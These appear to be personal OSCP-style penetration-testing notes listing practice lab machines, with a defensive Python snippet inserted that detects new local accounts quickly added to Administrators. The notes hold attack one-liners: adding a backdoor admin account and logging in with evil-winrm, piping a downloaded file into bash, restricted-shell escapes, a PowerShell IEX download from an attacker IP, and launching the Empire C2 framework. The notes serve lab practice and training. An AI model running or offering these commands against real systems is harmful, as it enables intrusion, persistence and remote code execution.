God notes
PG boxes on OSCP:
Heist, Hutch, Vault in PG Practice, Resourced
HTB:
APT, Fuse, Cascade, Monteverde, Resolute, Forest, Arkham, Active, Mantis
CyberSecLabs:
Zero, Secret, Brute, Dictionary, Roast, Spray, Sync, Toast
Always look for config files if you have access to application files!
Adds an admin account to the hosts.
Try the Legion script for nmap scanning!
Always run nmap -sC (default scripts).
If you are a service account you can create an admin account:
net user gori passwd123! /add; net localgroup administrators gori /add
evil-winrm -i IP -u gori -p 'passwd123!' to log in as the account you just created
net user gori to check its group memberships / privileges
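Added defender-side example (not part of these notes): a small correlation over Windows Security events that flags the 4720 (account created) followed by 4732 (member added to Administrators) sequence the net user / net localgroup pair above leaves behind. The events are constructed and their field names are simplified assumptions, not a real EVTX export.

```python
"""Flag a local account that is added to Administrators shortly after being
created, the trace left by `net user X /add; net localgroup administrators X /add`."""
from datetime import datetime

# Constructed sample Security-log events (assumed, simplified field names).
# Real 4732 events carry the member as a SID (MemberSid); resolve it to a
# name before matching against the 4720 TargetUserName.
EVENTS = [
    {"id": 4720, "time": "2024-05-01T10:00:00", "subject": "svc_backup", "target": "gori"},
    {"id": 4732, "time": "2024-05-01T10:00:02", "subject": "svc_backup", "member": "gori", "group": "Administrators"},
    {"id": 4720, "time": "2024-05-01T11:00:00", "subject": "helpdesk", "target": "jdoe"},
    {"id": 4732, "time": "2024-05-01T12:00:00", "subject": "helpdesk", "member": "jdoe", "group": "Remote Desktop Users"},
    {"id": 4732, "time": "2024-05-02T11:00:00", "subject": "helpdesk", "member": "jdoe", "group": "Administrators"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_instant_admins(events, window_seconds=300):
    """Return (subject, account, seconds) for every account that was created
    (4720) and then added to Administrators (4732) within window_seconds."""
    created = {}  # account name (lower-cased) -> (creation time, creating subject)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO timestamps sort lexically
        if ev["id"] == 4720:
            created[ev["target"].lower()] = (_ts(ev["time"]), ev["subject"])
        elif ev["id"] == 4732 and ev["group"].lower() == "administrators":
            record = created.get(ev["member"].lower())
            if record is None:
                continue  # pre-existing account; outside this rule's scope
            delta = (_ts(ev["time"]) - record[0]).total_seconds()
            if 0 <= delta <= window_seconds:
                hits.append((ev["subject"], ev["member"], delta))
    return hits


if __name__ == "__main__":
    for subject, account, secs in find_instant_admins(EVENTS):
        print(f"ALERT: {subject} created {account} and made it local admin after {secs:.0f}s")
```

The jdoe account is deliberately outside the window (a day apart) and its Remote Desktop Users membership is ignored, so only the gori sequence fires.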
---
/etc/apache2: look for config files here.
Linux enum
ldd --version (glibc version)
Transfer method (execute directly):
curl IP/file_name | bash
cat /etc/lsb-release (distro release)
Transfer method (download to disk):
python -m SimpleHTTPServer 80 (on the attacking host)
-> curl -o outputfile IP/filename (on the target)
Restricted shell? Try this:
ssh [email protected] -t "bash --noprofile"
[email protected]:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
bash: groups: command not found
[email protected]:~$ export PATH=$PATH:/bin/
[email protected]:~$ export PATH=$PATH:/usr/bin
---
Run sudo
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146:8080/mimidrv.sys')

docker run -it --name empire -v empire-data:/opt/Empire/data \
-p 443:443 --entrypoint bash empireproject/empire